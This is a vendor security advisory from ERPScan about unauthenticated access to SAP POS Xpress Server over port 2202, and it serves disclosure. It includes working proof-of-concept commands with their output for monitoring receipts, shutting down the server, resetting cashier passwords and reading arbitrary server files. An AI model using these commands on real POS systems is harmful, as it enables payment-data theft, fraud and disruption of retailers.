July 11, 2017

[ERPSCAN-17-032] SAP POS Missing Authentication in XpressServer

Missing Authorization Check vulnerability, POS Security

Application: SAP POS Xpress Server
Vendor URL: SAP
Bug: Missing Authentication Check
Reported: 15.05.2017
Vendor response: 16.05.2017
Date of Public Advisory: 11.07.2017
Reference: SAP Security Note 2520064
Author: Vladimir Egorov (ERPScan)

VULNERABILITY INFORMATION

Class: Missing Authentication Check
Impact: broken authentication
Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information

CVSS v3 Base Score: 8.1 / 10
CVSS v3 Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	High (H)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unchanged (U)
C: Impact to Confidentiality	High (H)
I: Impact to Integrity	High (H)
A: Impact to Availability	High (H)

Description

An attacker can read and clear file content on SAP POS server, shutdown the Xpress Server application, monitor POS terminals content and brute-force cashiers login and password.

Business risk

An attacker can use a Missing Authorization Check vulnerability to access a service without any authorization procedures and use service functionality that has restricted access. This can lead to information disclosure, privilege escalation and other attacks.

VULNERABLE PACKAGES

XPRESSBU 1020
XPRESSBU 1030

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2520064

TECHNICAL DESCRIPTION

An attacker can read and clear file content on SAP POS server, shutdown the Xpress Server application, monitor POS terminals content and brute-force cashiers’ login and password through Xpress Server TCP port 2202 without authentication.

For that, an attacker can connect to servers port 2202 using telnet. The welcome message shows the Xpress Servers version and name. “Help” command discovers some possible actions:

999 *** XPRESS SERVER MOST COMMON COMMAND HELP ***
999 MONXPS [ON|OFF]
999 [SHOWTERM|TERMINAL-STATUS] [ALL|Term#]
999 [MONTERM|MONITOR-TERMINAL] [ALL|XPS|Term#] [START|STOP|ON|OFF]
999 OPEN-TERMINAL [ALL|Term#]
999 OPEN-STORE [TODAY|NumberOfSecsSinceJan1-1970]
999 CLOSE-TERMINAL [ALL|Term#] [FORCE|NO-FORCE|ABORT]
999 TERMINAL-BALANCE [Term#] [BAL|UNBAL]
999 CASHIER-BALANCE [Cashier#] [1|2|3] [ShortOver Amount] [netTenderTotal] 
<-- 1=BALANCED 2=UNBALANCED 3=PREVIOUS BALANCE NOW OUT OF DATE
999 UPDATE-CASHIER [Cashier#]
999 DELETE-CASHIER [Cashier#]
999 END-OF-DAY [FORCE|NO-FORCE|ABORT]
999 STORE-TOTALS [CLOSE-DAY|CLOSE-WEEK|CLOSE-PERIOD|DONE-END-OF-DAY|...]
999 STORE-TOTALS CONSOL-DAY [RTOT|SRTOT|CTOT|SPROD|...]
999 COMMS-RESET [1|2|3] <-- 1=ALL 2=REMOTE 3=MODEMS
999 FLUSH-PLUCACHE
999 TRIGGER-NEWPROMOS
999 SHUTDOWN
999 .  <-- Use to repeat previous command

999 *** XPRESS SERVER MOST COMMON COMMAND HELP ***

999 MONXPS [ON|OFF]

999 [SHOWTERM|TERMINAL-STATUS] [ALL|Term#]

999 [MONTERM|MONITOR-TERMINAL] [ALL|XPS|Term#] [START|STOP|ON|OFF]

999 OPEN-TERMINAL [ALL|Term#]

999 OPEN-STORE [TODAY|NumberOfSecsSinceJan1-1970]

999 CLOSE-TERMINAL [ALL|Term#] [FORCE|NO-FORCE|ABORT]

999 TERMINAL-BALANCE [Term#] [BAL|UNBAL]

999 CASHIER-BALANCE [Cashier#] [1|2|3] [ShortOver Amount] [netTenderTotal]

<-- 1=BALANCED 2=UNBALANCED 3=PREVIOUS BALANCE NOW OUT OF DATE

999 UPDATE-CASHIER [Cashier#]

999 DELETE-CASHIER [Cashier#]

999 END-OF-DAY [FORCE|NO-FORCE|ABORT]

999 STORE-TOTALS [CLOSE-DAY|CLOSE-WEEK|CLOSE-PERIOD|DONE-END-OF-DAY|...]

999 STORE-TOTALS CONSOL-DAY [RTOT|SRTOT|CTOT|SPROD|...]

999 COMMS-RESET [1|2|3] <-- 1=ALL 2=REMOTE 3=MODEMS

999 FLUSH-PLUCACHE

999 TRIGGER-NEWPROMOS

999 SHUTDOWN

999 . <-- Use to repeat previous command

Nonetheless, there are some additional commands:

APM-validate-Passwd
APM-Reset-Passwd
FILE-OPEN [file-path] [mode]
FILE-FIND [file_path]
FILE-READ [file_id] [buff_size]
FILE-SEEK [file_id] [offset] [origin]
FILE-TELL [file_id]

APM-validate-Passwd

APM-Reset-Passwd

FILE-OPEN [file-path] [mode]

FILE-FIND [file_path]

FILE-READ [file_id] [buff_size]

FILE-SEEK [file_id] [offset] [origin]

FILE-TELL [file_id]

The most critical commands are provided below.

SHOWTERM

Show active and non-active terminals of the system and Backup Server, including Store Number, terminal number cashier and its number.

PoC

SHOWTERM ALL
100 0 0 STORE-OPEN BACKUP SERVER: NOT CONNECTED
100 1 0 01 CASHIER 1111
100 9999 0 END-OF-TERMINAL-STATUS

SHOWTERM ALL

100 0 0 STORE-OPEN BACKUP SERVER: NOT CONNECTED

100 1 0 01 CASHIER 1111

100 9999 0 END-OF-TERMINAL-STATUS

MONTERM

Let the user monitor all what ever appears on the receipt window of the POS terminal.

PoC

MONTERM 1
102 1 SALESPERSON # 1111
102 1 POTTERS BRANDY 1.75L 1000       p1.00 L
102 1   REGULAR PRICE               12.99
102 1 SUBTOTAL                            $1.00
102 1 5% LOCAL TAX                        $0.05
102 1 T O T A L                           $1.05
102 1 V I S A                             $1.05
102 1 4***********1111
102 1 PURCHASE
102 1 KEYED
102 1 LOCAL
102 1 AUTH#
102 1 LOCAL
102 1 INVOICE #:     405
102 1 2017-04-02 20:26:09
102 1   CUSTOMER ZIP CODE 1111111111
102 1 ITEMS 1
102 1 2017-04-02  20:26:10
102 1 000001 01 1111                        0405
102 1 ------------------------------------------

MONTERM 1

102 1 SALESPERSON # 1111

102 1 POTTERS BRANDY 1.75L 1000 p1.00 L

102 1 REGULAR PRICE 12.99

102 1 SUBTOTAL $1.00

102 1 5% LOCAL TAX $0.05

102 1 T O T A L $1.05

102 1 V I S A $1.05

102 1 4***********1111

102 1 PURCHASE

102 1 KEYED

102 1 LOCAL

102 1 AUTH#

102 1 LOCAL

102 1 INVOICE #: 405

102 1 2017-04-02 20:26:09

102 1 CUSTOMER ZIP CODE 1111111111

102 1 ITEMS 1

102 1 2017-04-02 20:26:10

102 1 000001 01 1111 0405

102 1 ------------------------------------------

RUNEOD AND TERMACTION

Initialize End of Day and sign off from POS terminal.

PoC

RUNEOD 0 1001 1
TERMACTION 1 1002 0 ACTION=Signoff;Term=1;

1 2	RUNEOD 0 1001 1 TERMACTION 1 1002 0 ACTION=Signoff;Term=1;

SHUTDOWN

Shutdown the Xpress Server application.

PoC

SHUTDOWN
Connection closed by foreign host.

1 2	SHUTDOWN Connection closed by foreign host.

APM-VALIDATE-PASSWD

Change the current cashier`s password (need to check it) on the new one.

PoC

APM-Validate-Passwd 0 1124 1 1111;1234567a    # Validate the current password
1124 0 1 1  Disp=Authenticated;APMCode=0;
APM-Reset-Passwd 0 1125 1 1111;7654321a        # If all`s ok, change password on the new one
1125 0 1 1  Disp=Authenticated;APMCode=0;
UPDATE-CASHIER 1111                                              # Apply the new setting in database
170 CASHIER-UPDATED 1111
Audit-Modify-Emp-Passwd 1111 1111                    # ???

APM-Validate-Passwd 0 1124 1 1111;1234567a # Validate the current password

1124 0 1 1 Disp=Authenticated;APMCode=0;

APM-Reset-Passwd 0 1125 1 1111;7654321a # If all`s ok, change password on the new one

1125 0 1 1 Disp=Authenticated;APMCode=0;

UPDATE-CASHIER 1111 # Apply the new setting in database

170 CASHIER-UPDATED 1111

Audit-Modify-Emp-Passwd 1111 1111 # ???

FILE-OPEN AND FILE-READ

Read data from any file on server.

PoC

FILE-OPEN C:\windows\win.ini
160 FILE-OPEN 0
FILE-READ 0 120
162 FILE-READ 0 120
EGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

FILE-OPEN C:\windows\win.ini

160 FILE-OPEN 0

FILE-READ 0 120

162 FILE-READ 0 120

EGVideo

m4v=MPEGVideo

mod=MPEGVideo

mov=MPEGVideo

mp4=MPEGVideo

mp4v=MPEGVideo

mts=MPEGVideo

ts=MPEGVideo

tts=MPEGVideo